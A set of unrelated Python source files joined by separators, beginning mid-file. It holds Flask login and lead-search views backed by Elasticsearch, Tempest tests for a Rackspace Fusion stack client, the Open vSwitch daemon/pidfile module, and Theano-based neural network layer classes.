Returns:
redirect: page redirect
"""
if 'username' in flask.session:
return flask.redirect(flask.url_for('home'))
else:
return flask.render_template("login.html")
def post(self):
"""Checks for user credentials
Returns:
redirect: page redirect
"""
cred = {
'username': flask.request.form['email'],
'password': flask.request.form['password']
}
# @todo : clean and validate cred
user = User(cred)
if user.authenticate():
flask.session['username'] = cred['username']
return flask.redirect(flask.url_for('home'))
else:
flask.flash("User Authentication Failed. Please try again.")
return self.get()
class Logout(flask.views.MethodView):
"""Logout url route Class"""
@login_required
def get(self):
"""Clears flask session and redirects to login page
Returns:
redirect: page redirect
"""
flask.session.pop('username', None)
return flask.redirect(flask.url_for('login'))
class Leads(flask.views.MethodView):
"""Leads url route Class"""
@login_required
def post(self):
"""Processes search query string using nltk,
and fetches latest leads from elasticsearch
handler (es_handler) module
Returns:
string: processed leads docs (relevance boosted and filtered based on query)
"""
count = flask.request.form.get('count') or 5
offset = flask.request.form.get('offset') or 0
search_query = flask.request.form.get('search_query') or ''
if len(str(search_query))>0:
search_query = self.process_query(search_query);
leads = es.get_latest_leads(search_query, count, offset)
return json.dumps(leads)
def process_query(self, search_query):
"""Removes stopwords, extracts categories(#tags) and entities(@mentions)
Args:
search_query (string): search query string
Returns:
dict: parsed dictionary containing tokens, categories and entities
"""
res = {}
# remove stopwords
stop = stopwords.words("english")
tokens = search_query.split()
res['tokens'] = [token.lower() for token in tokens if token not in stop]
# get #hash_tags from search query
res['categories'] = [hash_tag.lower()[1:] for hash_tag in tokens if hash_tag[0]=="#"]
# get @mentions from search query
res['entities'] = [mention.lower()[1:] for mention in tokens if mention[0]=="@"]
return res
class Reporters(flask.views.MethodView):
"""Reporters url route Class"""
@login_required
def post(self):
"""Fetches reporter document from ES, based on
reporter id
Returns:
string: reporter document
"""
reporter_id = flask.request.form.get('reporter_id') or 0
reporter = json.dumps(es.get_reporter(reporter_id))
return reporter
class LeadCount(flask.views.MethodView):
"""LeadCount url route Class"""
@login_required
def post(self):
"""Fetches lead document count based on bucket aggregations
if agg_type is None, it fetches total documents count
Returns:
string: document counts
"""
agg_type = flask.request.form.get('agg_type')
agg_size = flask.request.form.get('agg_size') or 10
time_interval = flask.request.form.get('time_interval')
count_res = json.dumps(es.get_leadcount(agg_type, time_interval, agg_size))
return count_res
class ReporterCount(flask.views.MethodView):
"""ReporterCount url route Class"""
@login_required
def post(self):
"""Fetches reporter documents count from ES
Returns:
string: reporters count
"""
count_res = json.dumps(es.get_reportercount())
return count_res
url_rules = [
{'url':'/', 'class':Home, 'view_name':'home'},
{'url':'/logout/', 'class':Logout, 'view_name':'logout'},
{'url':'/login/', 'class':Login, 'view_name':'login', 'methods':['GET', 'POST']},
{'url':'/lead/get/', 'class':Leads, 'view_name':'leads', 'methods':['GET', 'POST']},
{'url':'/lead/count/get/', 'class':LeadCount, 'view_name':'leadcount', 'methods':['GET', 'POST']},
{'url':'/reporter/get/', 'class':Reporters, 'view_name':'reporters', 'methods':['GET', 'POST']},
{'url':'/reporter/count/get/', 'class':ReporterCount, 'view_name':'reportercount', 'methods':['GET', 'POST']}
]
# add url rules to Flask app
add_url_rules(url_rules)
| |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest.scenario import manager
from tempest.test import services
from tempest.common.utils.data_utils import rand_name
import time
class FusionClientTest(manager.FusionScenarioTest):
def setUp(self):
super(FusionClientTest, self).setUp()
self.client = self.fusion_client
def test_get_single_template(self):
template_id="wordpress-single"
resp = self.client.templates.get(template_id)
resp = resp.to_dict()
self.assertIn('description',resp,)
def test_single_template_with_metadata(self):
template_id="wordpress-single"
resp = self.client.templates.get(template_id,with_metadata=True)
resp = resp.to_dict()
self.assertIn('rackspace-metadata',resp,)
def test_get_template_catalog(self):
resp = self.client.templates.get_all()
for template in resp:
template = template.to_dict()
self.assertIn('description', template)
def test_get_template_catalog_with_metadata(self):
resp = self.client.templates.get_all(with_metadata=True)
for template in resp:
template = template.to_dict()
self.assertIn('rackspace-metadata', template)
def test_get_list_of_stack(self):
stacks = self.client.stacks.list()
for stack in stacks:
stack = stack.__dict__
self.assertIn('stack_status', stack)
def test_stack_preview(self):
template_id = "wordpress-single"
region = "DFW"
parameters={}
stack_name = rand_name("fusion_"+template_id+region)
resp = self.client.templates.get(template_id,with_metadata=True)
resp = resp.to_dict()
body = self.client.stacks.preview(
template_id="wordpress-single",
stack_name=stack_name,
parameters=parameters)
body= body.to_dict()
print "test"
response_resource_list = []
for resource in body['resources']:
response_resource_list.append(resource['resource_type'])
response_resource_list.sort()
template_resource_list = []
resources_temp = resp['resources']
for key, value in resources_temp.iteritems():
resource = value['type']
template_resource_list.append(resource)
template_resource_list.sort()
self.comp_list(response_resource_list,template_resource_list)
def test_stack_preview_with_template_content(self):
parameters={}
template_id="wordpress-single"
resp = self.client.templates.get(template_id)
resp = resp.to_dict()
region = "DFW"
stack_name = rand_name("fusion_"+template_id+region)
body = self.client.stacks.preview(
template_id="wordpress-single",
stack_name=stack_name,
parameters=parameters)
body= body.to_dict()
response_resource_list = []
for resource in body['resources']:
response_resource_list.append(resource['resource_type'])
response_resource_list.sort()
template_resource_list = []
resources_temp = resp['resources']
for key, value in resources_temp.iteritems():
resource = value['type']
template_resource_list.append(resource)
template_resource_list.sort()
self.comp_list(response_resource_list,template_resource_list)
def test_create_stack_with_supported_template_id(self):
template_id = "wordpress-single"
region = "QA"
parameters={}
stack_name = rand_name("fusion_"+template_id+region)
body = self.client.stacks.create(
template_id="wordpress-single",
stack_name=stack_name,
parameters=parameters)
stack_id = "%s/%s"%(stack_name,body['stack']['id'])
body = self.client.stacks.get(stack_id,with_support_info=True)
body=body.to_dict()
self.assertIn('template_id', body,)
self.assertIn('application_name', body)
self.assertIn('rackspace_template', body)
self.client.stacks.delete(stack_id)
def test_create_stack_with_supported_template_id_with_false_support_info(
self):
template_id = "wordpress-single"
region = "QA"
parameters={}
stack_name = rand_name("fusion_"+template_id+region)
body = self.client.stacks.create(
template_id="wordpress-single",
stack_name=stack_name,
parameters=parameters)
stack_id = "%s/%s"%(stack_name,body['stack']['id'])
body = self.client.stacks.get(stack_id)
body=body.to_dict()
self.assertNotIn('template_id', body,)
self.assertNotIn('application_name', body)
self.assertNotIn('rackspace_template', body)
self.client.stacks.delete(stack_id)
def test_create_stack_with_supported_template(self):
# Unsupported Template with flag as False
parameters={}
template_id="wordpress-single"
resp = self.client.templates.get(template_id)
resp = resp.to_dict()
stack_name = rand_name("Fusion_")
body = self.client.stacks.create(
template=resp,
stack_name=stack_name,
parameters=parameters)
stack_id = body['stack']['id']
body = self.client.stacks.get(stack_id,with_support_info=True)
body= body.to_dict()
self.assertNotIn('template_id', body)
self.assertIn('application_name', body)
self.assertIn('rackspace_template', body)
self.client.stacks.delete(stack_id)
def test_stack_update(self):
template_id = "wordpress-single"
region = "DFW"
parameters={}
stack_name =rand_name("fusion_shwe_"+template_id+region)
body = self.client.stacks.create(
template_id="wordpress-single",
stack_name=stack_name,
parameters=parameters)
stack_identifier = body['stack']['id']
stack_id = "%s/%s" % (stack_name,stack_identifier)
body = self.client.stacks.get(stack_id)
count = 0
body = body.to_dict()
while body['stack_status'] == 'CREATE_IN_PROGRESS' and count < 20:
body = self.client.stacks.get(stack_id)
body = body.to_dict()
print "Deployment in %s status. Checking again in 1 minute" % \
body['stack_status']
time.sleep(60)
count += 1
if body['stack_status'] == 'CREATE_FAILED':
print "Stack create failed. Here's why: %s" % body['stack_status_reason']
if count == 20:
print "Stack create has taken over 20 minutes. Force " \
"failing now."
self.client.stacks.delete(stack_id)
if body['stack_status'] == 'CREATE_COMPLETE':
body_update = self.client.stacks.update(stack_identifier,
template_id=template_id,parameters=parameters)
self.client.stacks.delete(stack_id)
def comp_list(self ,list1, list2):
Result = []
for val in list1:
if val in list2:
Result.append(True)
else :
Result.append(False)
if False in Result:
print "Resources in template and stack_preview response are " \
"different"
else:
print"Resources in template and stack_preview response are " \
"same"
| |
# Copyright (c) 2010, 2011 Nicira, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import errno
import fcntl
import os
import resource
import signal
import sys
import time
import ovs.dirs
import ovs.fatal_signal
#import ovs.lockfile
import ovs.process
import ovs.socket_util
import ovs.timeval
import ovs.util
import ovs.vlog
vlog = ovs.vlog.Vlog("daemon")
# --detach: Should we run in the background?
_detach = False
# --pidfile: Name of pidfile (null if none).
_pidfile = None
# Our pidfile's inode and device, if we have created one.
_pidfile_dev = None
_pidfile_ino = None
# --overwrite-pidfile: Create pidfile even if one already exists and is locked?
_overwrite_pidfile = False
# --no-chdir: Should we chdir to "/"?
_chdir = True
# --monitor: Should a supervisory process monitor the daemon and restart it if
# it dies due to an error signal?
_monitor = False
# File descriptor used by daemonize_start() and daemonize_complete().
_daemonize_fd = None
RESTART_EXIT_CODE = 5
def make_pidfile_name(name):
"""Returns the file name that would be used for a pidfile if 'name' were
provided to set_pidfile()."""
if name is None or name == "":
return "%s/%s.pid" % (ovs.dirs.RUNDIR, ovs.util.PROGRAM_NAME)
else:
return ovs.util.abs_file_name(ovs.dirs.RUNDIR, name)
def set_pidfile(name):
"""Sets up a following call to daemonize() to create a pidfile named
'name'. If 'name' begins with '/', then it is treated as an absolute path.
Otherwise, it is taken relative to ovs.util.RUNDIR, which is
$(prefix)/var/run by default.
If 'name' is null, then ovs.util.PROGRAM_NAME followed by ".pid" is
used."""
global _pidfile
_pidfile = make_pidfile_name(name)
def get_pidfile():
"""Returns an absolute path to the configured pidfile, or None if no
pidfile is configured."""
return _pidfile
def set_no_chdir():
"""Sets that we do not chdir to "/"."""
global _chdir
_chdir = False
def is_chdir_enabled():
"""Will we chdir to "/" as part of daemonizing?"""
return _chdir
def ignore_existing_pidfile():
"""Normally, daemonize() or daemonize_start() will terminate the program
with a message if a locked pidfile already exists. If this function is
called, an existing pidfile will be replaced, with a warning."""
global _overwrite_pidfile
_overwrite_pidfile = True
def set_detach():
"""Sets up a following call to daemonize() to detach from the foreground
session, running this process in the background."""
global _detach
_detach = True
def get_detach():
"""Will daemonize() really detach?"""
return _detach
def set_monitor():
"""Sets up a following call to daemonize() to fork a supervisory process to
monitor the daemon and restart it if it dies due to an error signal."""
global _monitor
_monitor = True
def _fatal(msg):
vlog.err(msg)
sys.stderr.write("%s\n" % msg)
sys.exit(1)
def _make_pidfile():
"""If a pidfile has been configured, creates it and stores the running
process's pid in it. Ensures that the pidfile will be deleted when the
process exits."""
pid = os.getpid()
# Create a temporary pidfile.
tmpfile = "%s.tmp%d" % (_pidfile, pid)
ovs.fatal_signal.add_file_to_unlink(tmpfile)
try:
# This is global to keep Python from garbage-collecting and
# therefore closing our file after this function exits. That would
# unlock the lock for us, and we don't want that.
global file_handle
file_handle = open(tmpfile, "w")
except IOError as e:
_fatal("%s: create failed (%s)" % (tmpfile, e.strerror))
try:
s = os.fstat(file_handle.fileno())
except IOError as e:
_fatal("%s: fstat failed (%s)" % (tmpfile, e.strerror))
try:
file_handle.write("%s\n" % pid)
file_handle.flush()
except OSError as e:
_fatal("%s: write failed: %s" % (tmpfile, e.strerror))
try:
fcntl.lockf(file_handle, fcntl.LOCK_EX | fcntl.LOCK_NB)
except IOError as e:
_fatal("%s: fcntl failed: %s" % (tmpfile, e.strerror))
# Rename or link it to the correct name.
if _overwrite_pidfile:
try:
os.rename(tmpfile, _pidfile)
except OSError as e:
_fatal("failed to rename \"%s\" to \"%s\" (%s)"
% (tmpfile, _pidfile, e.strerror))
else:
while True:
try:
os.link(tmpfile, _pidfile)
error = 0
except OSError as e:
error = e.errno
if error == errno.EEXIST:
_check_already_running()
elif error != errno.EINTR:
break
if error:
_fatal("failed to link \"%s\" as \"%s\" (%s)"
% (tmpfile, _pidfile, os.strerror(error)))
# Ensure that the pidfile will get deleted on exit.
ovs.fatal_signal.add_file_to_unlink(_pidfile)
# Delete the temporary pidfile if it still exists.
if not _overwrite_pidfile:
error = ovs.fatal_signal.unlink_file_now(tmpfile)
if error:
_fatal("%s: unlink failed (%s)" % (tmpfile, os.strerror(error)))
global _pidfile_dev
global _pidfile_ino
_pidfile_dev = s.st_dev
_pidfile_ino = s.st_ino
def daemonize():
"""If configured with set_pidfile() or set_detach(), creates the pid file
and detaches from the foreground session."""
daemonize_start()
daemonize_complete()
def _waitpid(pid, options):
while True:
try:
return os.waitpid(pid, options)
except OSError as e:
if e.errno == errno.EINTR:
pass
return -e.errno, 0
def _fork_and_wait_for_startup():
try:
rfd, wfd = os.pipe()
except OSError as e:
sys.stderr.write("pipe failed: %s\n" % os.strerror(e.errno))
sys.exit(1)
try:
pid = os.fork()
except OSError as e:
sys.stderr.write("could not fork: %s\n" % os.strerror(e.errno))
sys.exit(1)
if pid > 0:
# Running in parent process.
os.close(wfd)
ovs.fatal_signal.fork()
while True:
try:
s = os.read(rfd, 1)
error = 0
except OSError as e:
s = ""
error = e.errno
if error != errno.EINTR:
break
if len(s) != 1:
retval, status = _waitpid(pid, 0)
if retval == pid:
if os.WIFEXITED(status) and os.WEXITSTATUS(status):
# Child exited with an error. Convey the same error to
# our parent process as a courtesy.
sys.exit(os.WEXITSTATUS(status))
else:
sys.stderr.write("fork child failed to signal "
"startup (%s)\n"
% ovs.process.status_msg(status))
else:
assert retval < 0
sys.stderr.write("waitpid failed (%s)\n"
% os.strerror(-retval))
sys.exit(1)
os.close(rfd)
else:
# Running in parent process.
os.close(rfd)
ovs.timeval.postfork()
#ovs.lockfile.postfork()
global _daemonize_fd
_daemonize_fd = wfd
return pid
def _fork_notify_startup(fd):
if fd is not None:
error, bytes_written = ovs.socket_util.write_fully(fd, "0")
if error:
sys.stderr.write("could not write to pipe\n")
sys.exit(1)
os.close(fd)
def _should_restart(status):
global RESTART_EXIT_CODE
if os.WIFEXITED(status) and os.WEXITSTATUS(status) == RESTART_EXIT_CODE:
return True
if os.WIFSIGNALED(status):
for signame in ("SIGABRT", "SIGALRM", "SIGBUS", "SIGFPE", "SIGILL",
"SIGPIPE", "SIGSEGV", "SIGXCPU", "SIGXFSZ"):
if os.WTERMSIG(status) == getattr(signal, signame, None):
return True
return False
def _monitor_daemon(daemon_pid):
# XXX should log daemon's stderr output at startup time
# XXX should use setproctitle module if available
last_restart = None
while True:
retval, status = _waitpid(daemon_pid, 0)
if retval < 0:
sys.stderr.write("waitpid failed\n")
sys.exit(1)
elif retval == daemon_pid:
status_msg = ("pid %d died, %s"
% (daemon_pid, ovs.process.status_msg(status)))
if _should_restart(status):
if os.WCOREDUMP(status):
# Disable further core dumps to save disk space.
try:
resource.setrlimit(resource.RLIMIT_CORE, (0, 0))
except resource.error:
vlog.warn("failed to disable core dumps")
# Throttle restarts to no more than once every 10 seconds.
if (last_restart is not None and
ovs.timeval.msec() < last_restart + 10000):
vlog.warn("%s, waiting until 10 seconds since last "
"restart" % status_msg)
while True:
now = ovs.timeval.msec()
wakeup = last_restart + 10000
if now > wakeup:
break
print("sleep %f" % ((wakeup - now) / 1000.0))
time.sleep((wakeup - now) / 1000.0)
last_restart = ovs.timeval.msec()
vlog.err("%s, restarting" % status_msg)
daemon_pid = _fork_and_wait_for_startup()
if not daemon_pid:
break
else:
vlog.info("%s, exiting" % status_msg)
sys.exit(0)
# Running in new daemon process.
def _close_standard_fds():
"""Close stdin, stdout, stderr. If we're started from e.g. an SSH session,
then this keeps us from holding that session open artificially."""
null_fd = ovs.socket_util.get_null_fd()
if null_fd >= 0:
os.dup2(null_fd, 0)
os.dup2(null_fd, 1)
os.dup2(null_fd, 2)
def daemonize_start():
"""If daemonization is configured, then starts daemonization, by forking
and returning in the child process. The parent process hangs around until
the child lets it know either that it completed startup successfully (by
calling daemon_complete()) or that it failed to start up (by exiting with a
nonzero exit code)."""
if _detach:
if _fork_and_wait_for_startup() > 0:
# Running in parent process.
sys.exit(0)
# Running in daemon or monitor process.
if _monitor:
saved_daemonize_fd = _daemonize_fd
daemon_pid = _fork_and_wait_for_startup()
if daemon_pid > 0:
# Running in monitor process.
_fork_notify_startup(saved_daemonize_fd)
_close_standard_fds()
_monitor_daemon(daemon_pid)
# Running in daemon process
if _pidfile:
_make_pidfile()
def daemonize_complete():
"""If daemonization is configured, then this function notifies the parent
process that the child process has completed startup successfully."""
_fork_notify_startup(_daemonize_fd)
if _detach:
os.setsid()
if _chdir:
os.chdir("/")
_close_standard_fds()
def usage():
sys.stdout.write("""
Daemon options:
--detach run in background as daemon
--no-chdir do not chdir to '/'
--pidfile[=FILE] create pidfile (default: %s/%s.pid)
--overwrite-pidfile with --pidfile, start even if already running
""" % (ovs.dirs.RUNDIR, ovs.util.PROGRAM_NAME))
def __read_pidfile(pidfile, delete_if_stale):
if _pidfile_dev is not None:
try:
s = os.stat(pidfile)
if s.st_ino == _pidfile_ino and s.st_dev == _pidfile_dev:
# It's our own pidfile. We can't afford to open it,
# because closing *any* fd for a file that a process
# has locked also releases all the locks on that file.
#
# Fortunately, we know the associated pid anyhow.
return os.getpid()
except OSError:
pass
try:
file_handle = open(pidfile, "r+")
except IOError as e:
if e.errno == errno.ENOENT and delete_if_stale:
return 0
vlog.warn("%s: open: %s" % (pidfile, e.strerror))
return -e.errno
# Python fcntl doesn't directly support F_GETLK so we have to just try
# to lock it.
try:
fcntl.lockf(file_handle, fcntl.LOCK_EX | fcntl.LOCK_NB)
# pidfile exists but wasn't locked by anyone. Now we have the lock.
if not delete_if_stale:
file_handle.close()
vlog.warn("%s: pid file is stale" % pidfile)
return -errno.ESRCH
# Is the file we have locked still named 'pidfile'?
try:
raced = False
s = os.stat(pidfile)
s2 = os.fstat(file_handle.fileno())
if s.st_ino != s2.st_ino or s.st_dev != s2.st_dev:
raced = True
except IOError:
raced = True
if raced:
vlog.warn("%s: lost race to delete pidfile" % pidfile)
return -errno.EALREADY
# We won the right to delete the stale pidfile.
try:
os.unlink(pidfile)
except IOError as e:
vlog.warn("%s: failed to delete stale pidfile (%s)"
% (pidfile, e.strerror))
return -e.errno
else:
vlog.dbg("%s: deleted stale pidfile" % pidfile)
file_handle.close()
return 0
except IOError as e:
if e.errno not in [errno.EACCES, errno.EAGAIN]:
vlog.warn("%s: fcntl: %s" % (pidfile, e.strerror))
return -e.errno
# Someone else has the pidfile locked.
try:
try:
error = int(file_handle.readline())
except IOError as e:
vlog.warn("%s: read: %s" % (pidfile, e.strerror))
error = -e.errno
except ValueError:
vlog.warn("%s does not contain a pid" % pidfile)
error = -errno.EINVAL
return error
finally:
try:
file_handle.close()
except IOError:
pass
def read_pidfile(pidfile):
"""Opens and reads a PID from 'pidfile'. Returns the positive PID if
successful, otherwise a negative errno value."""
return __read_pidfile(pidfile, False)
def _check_already_running():
pid = __read_pidfile(_pidfile, True)
if pid > 0:
_fatal("%s: already running as pid %d, aborting" % (_pidfile, pid))
elif pid < 0:
_fatal("%s: pidfile check failed (%s), aborting"
% (_pidfile, os.strerror(pid)))
def add_args(parser):
"""Populates 'parser', an ArgumentParser allocated using the argparse
module, with the command line arguments required by the daemon module."""
pidfile = make_pidfile_name(None)
group = parser.add_argument_group(title="Daemon Options")
group.add_argument("--detach", action="store_true",
help="Run in background as a daemon.")
group.add_argument("--no-chdir", action="store_true",
help="Do not chdir to '/'.")
group.add_argument("--monitor", action="store_true",
help="Monitor %s process." % ovs.util.PROGRAM_NAME)
group.add_argument("--pidfile", nargs="?", const=pidfile,
help="Create pidfile (default %s)." % pidfile)
group.add_argument("--overwrite-pidfile", action="store_true",
help="With --pidfile, start even if already running.")
def handle_args(args):
"""Handles daemon module settings in 'args'. 'args' is an object
containing values parsed by the parse_args() method of ArgumentParser. The
parent ArgumentParser should have been prepared by add_args() before
calling parse_args()."""
if args.detach:
set_detach()
if args.no_chdir:
set_no_chdir()
if args.pidfile:
set_pidfile(args.pidfile)
if args.overwrite_pidfile:
ignore_existing_pidfile()
if args.monitor:
set_monitor()
| |
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division
import theano
import theano.tensor as T
import numpy as np
from .. import activations, initializations, regularizers, constraints
from ..utils.theano_utils import shared_zeros, floatX
from ..utils.generic_utils import make_tuple
from ..regularizers import ActivityRegularizer, Regularizer
from theano.sandbox.rng_mrg import MRG_RandomStreams as RandomStreams
from six.moves import zip
class Layer(object):
def __init__(self):
self.params = []
self.name = None
def init_updates(self):
self.updates = []
def set_previous(self, layer, connection_map={}):
assert self.nb_input == layer.nb_output == 1, "Cannot connect layers: input count and output count should be 1."
if not self.supports_masked_input() and layer.get_output_mask() is not None:
raise Exception("Cannot connect non-masking layer to layer with masked output")
self.previous = layer
@property
def nb_input(self):
return 1
@property
def nb_output(self):
return 1
def get_output(self, train=False):
return self.get_input(train)
def get_input(self, train=False):
if hasattr(self, 'previous'):
return self.previous.get_output(train=train)
else:
return self.input
def supports_masked_input(self):
''' Whether or not this layer respects the output mask of its previous layer in its calculations. If you try
to attach a layer that does *not* support masked_input to a layer that gives a non-None output_mask() that is
an error'''
return False
def get_output_mask(self, train=None):
'''
For some models (such as RNNs) you want a way of being able to mark some output data-points as
"masked", so they are not used in future calculations. In such a model, get_output_mask() should return a mask
of one less dimension than get_output() (so if get_output is (nb_samples, nb_timesteps, nb_dimensions), then the mask
is (nb_samples, nb_timesteps), with a one for every unmasked datapoint, and a zero for every masked one.
If there is *no* masking then it shall return None. For instance if you attach an Activation layer (they support masking)
to a layer with an output_mask, then that Activation shall also have an output_mask. If you attach it to a layer with no
such mask, then the Activation's get_output_mask shall return None.
Some layers have an output_mask even if their input is unmasked, notably Embedding which can turn the entry "0" into
a mask.
'''
return None
def set_weights(self, weights):
for p, w in zip(self.params, weights):
if p.eval().shape != w.shape:
raise Exception("Layer shape %s not compatible with weight shape %s." % (p.eval().shape, w.shape))
p.set_value(floatX(w))
def get_weights(self):
weights = []
for p in self.params:
weights.append(p.get_value())
return weights
def get_config(self):
return {"name": self.__class__.__name__}
def get_params(self):
consts = []
updates = []
if hasattr(self, 'regularizers'):
regularizers = self.regularizers
else:
regularizers = []
if hasattr(self, 'constraints') and len(self.constraints) == len(self.params):
for c in self.constraints:
if c:
consts.append(c)
else:
consts.append(constraints.identity())
elif hasattr(self, 'constraint') and self.constraint:
consts += [self.constraint for _ in range(len(self.params))]
else:
consts += [constraints.identity() for _ in range(len(self.params))]
if hasattr(self, 'updates') and self.updates:
updates += self.updates
return self.params, regularizers, consts, updates
def set_name(self, name=None):
if name is None:
name = self.__class__.__name__
if self.name is not None:
# if already set, we only need to replace the prefix
old_name_len = len(self.name)
for p in self.params:
p.name = name + p.name[old_name_len:]
else: # first time we same the layer name
self.name = name
# we set all parameter names
for i, p in enumerate(self.params):
if p is None:
p.name = '%s_p%d' % (name, i)
else:
p.name = '%s_%s' % (name, p.name)
return
class MaskedLayer(Layer):
'''
If your layer trivially supports masking (by simply copying the input mask to the output), then subclass MaskedLayer
instead of Layer, and make sure that you incorporate the input mask into your calculation of get_output()
'''
def supports_masked_input(self):
return True
def get_input_mask(self, train=False):
if hasattr(self, 'previous'):
return self.previous.get_output_mask(train)
else:
return None
def get_output_mask(self, train=False):
''' The default output mask is just the input mask unchanged. Override this in your own
implementations if, for instance, you are reshaping the input'''
return self.get_input_mask(train)
class Masking(MaskedLayer):
"""Mask an input sequence by using a mask value to identify padding.
This layer copies the input to the output layer with identified padding
replaced with 0s and creates an output mask in the process.
At each timestep, if the values all equal `mask_value`,
then the corresponding mask value for the timestep is 0 (skipped),
otherwise it is 1.
"""
def __init__(self, mask_value=0.):
super(Masking, self).__init__()
self.mask_value = mask_value
self.input = T.tensor3()
def get_output_mask(self, train=False):
X = self.get_input(train)
return T.any(T.ones_like(X) * (1. - T.eq(X, self.mask_value)), axis=-1)
def get_output(self, train=False):
X = self.get_input(train)
return X * T.shape_padright(T.any((1. - T.eq(X, self.mask_value)), axis=-1))
def get_config(self):
return {"name": self.__class__.__name__,
"mask_value": self.mask_value}
class Merge(Layer):
def __init__(self, layers, mode='sum', concat_axis=-1):
''' Merge the output of a list of layers or containers into a single tensor.
mode: {'sum', 'mul', 'concat'}
'''
if len(layers) < 2:
raise Exception("Please specify two or more input layers (or containers) to merge")
self.mode = mode
self.concat_axis = concat_axis
self.layers = layers
self.params = []
self.regularizers = []
self.constraints = []
self.updates = []
for l in self.layers:
params, regs, consts, updates = l.get_params()
self.regularizers += regs
self.updates += updates
# params and constraints have the same size
for p, c in zip(params, consts):
if p not in self.params:
self.params.append(p)
self.constraints.append(c)
def get_params(self):
return self.params, self.regularizers, self.constraints, self.updates
def get_output(self, train=False):
if self.mode == 'sum':
s = self.layers[0].get_output(train)
for i in range(1, len(self.layers)):
s += self.layers[i].get_output(train)
return s
elif self.mode == 'concat':
inputs = [self.layers[i].get_output(train) for i in range(len(self.layers))]
return T.concatenate(inputs, axis=self.concat_axis)
elif self.mode == 'mul':
s = self.layers[0].get_output(train)
for i in range(1, len(self.layers)):
s *= self.layers[i].get_output(train)
return s
else:
raise Exception('Unknown merge mode')
def get_input(self, train=False):
res = []
for i in range(len(self.layers)):
o = self.layers[i].get_input(train)
if not type(o) == list:
o = [o]
for output in o:
if output not in res:
res.append(output)
return res
@property
def input(self):
return self.get_input()
def supports_masked_input(self):
return False
def get_output_mask(self, train=None):
return None
def get_weights(self):
weights = []
for l in self.layers:
weights += l.get_weights()
return weights
def set_weights(self, weights):
for i in range(len(self.layers)):
nb_param = len(self.layers[i].params)
self.layers[i].set_weights(weights[:nb_param])
weights = weights[nb_param:]
def get_config(self):
return {"name": self.__class__.__name__,
"layers": [l.get_config() for l in self.layers],
"mode": self.mode,
"concat_axis": self.concat_axis}
class Dropout(MaskedLayer):
'''
Hinton's dropout.
'''
def __init__(self, p):
super(Dropout, self).__init__()
self.p = p
self.srng = RandomStreams(seed=np.random.randint(10e6))
def get_output(self, train=False):
X = self.get_input(train)
if self.p > 0.:
retain_prob = 1. - self.p
if train:
X *= self.srng.binomial(X.shape, p=retain_prob, dtype=theano.config.floatX)
else:
X *= retain_prob
return X
def get_config(self):
return {"name": self.__class__.__name__,
"p": self.p}
class Activation(MaskedLayer):
'''
Apply an activation function to an output.
'''
def __init__(self, activation, target=0, beta=0.1):
super(Activation, self).__init__()
self.activation = activations.get(activation)
self.target = target
self.beta = beta
def get_output(self, train=False):
X = self.get_input(train)
return self.activation(X)
def get_config(self):
return {"name": self.__class__.__name__,
"activation": self.activation.__name__,
"target": self.target,
"beta": self.beta}
class Reshape(Layer):
'''
Reshape an output to a certain shape.
Can't be used as first layer in a model (no fixed input!)
First dimension is assumed to be nb_samples.
'''
def __init__(self, *dims):
super(Reshape, self).__init__()
self.dims = dims
def get_output(self, train=False):
X = self.get_input(train)
nshape = make_tuple(X.shape[0], *self.dims)
return theano.tensor.reshape(X, nshape)
def get_config(self):
return {"name": self.__class__.__name__,
"dims": self.dims}
class Permute(Layer):
'''
Permute the dimensions of the data according to the given tuple
'''
def __init__(self, dims):
super(Permute, self).__init__()
self.dims = dims
def get_output(self, train):
X = self.get_input(train)
return X.dimshuffle((0,) + self.dims)
def get_config(self):
return {"name": self.__class__.__name__,
"dims": self.dims}
class Flatten(Layer):
'''
Reshape input to flat shape.
First dimension is assumed to be nb_samples.
'''
def __init__(self):
super(Flatten, self).__init__()
def get_output(self, train=False):
X = self.get_input(train)
size = theano.tensor.prod(X.shape) // X.shape[0]
nshape = (X.shape[0], size)
return theano.tensor.reshape(X, nshape)
class RepeatVector(Layer):
'''
Repeat input n times.
Dimensions of input are assumed to be (nb_samples, dim).
Return tensor of shape (nb_samples, n, dim).
'''
def __init__(self, n):
super(RepeatVector, self).__init__()
self.n = n
def get_output(self, train=False):
X = self.get_input(train)
tensors = [X]*self.n
stacked = theano.tensor.stack(*tensors)
return stacked.dimshuffle((1, 0, 2))
def get_config(self):
return {"name": self.__class__.__name__,
"n": self.n}
class Dense(Layer):
'''
Just your regular fully connected NN layer.
'''
def __init__(self, input_dim, output_dim, init='glorot_uniform', activation='linear', weights=None, name=None,
W_regularizer=None, b_regularizer=None, activity_regularizer=None,
W_constraint=None, b_constraint=None):
super(Dense, self).__init__()
self.init = initializations.get(init)
self.activation = activations.get(activation)
self.input_dim = input_dim
self.output_dim = output_dim
self.input = T.matrix()
self.W = self.init((self.input_dim, self.output_dim), name='W')
self.b = shared_zeros((self.output_dim), name='b')
self.params = [self.W, self.b]
self.regularizers = []
self.W_regularizer = regularizers.get(W_regularizer)
if self.W_regularizer:
self.W_regularizer.set_param(self.W)
self.regularizers.append(self.W_regularizer)
self.b_regularizer = regularizers.get(b_regularizer)
if self.b_regularizer:
self.b_regularizer.set_param(self.b)
self.regularizers.append(self.b_regularizer)
self.activity_regularizer = regularizers.get(activity_regularizer)
if self.activity_regularizer:
self.activity_regularizer.set_layer(self)
self.regularizers.append(self.activity_regularizer)
self.W_constraint = constraints.get(W_constraint)
self.b_constraint = constraints.get(b_constraint)
self.constraints = [self.W_constraint, self.b_constraint]
if weights is not None:
self.set_weights(weights)
if name is not None:
self.set_name(name)
def set_name(self, name):
self.W.name = '%s_W' % name
self.b.name = '%s_b' % name
def get_output(self, train=False):
X = self.get_input(train)
output = self.activation(T.dot(X, self.W) + self.b)
return output
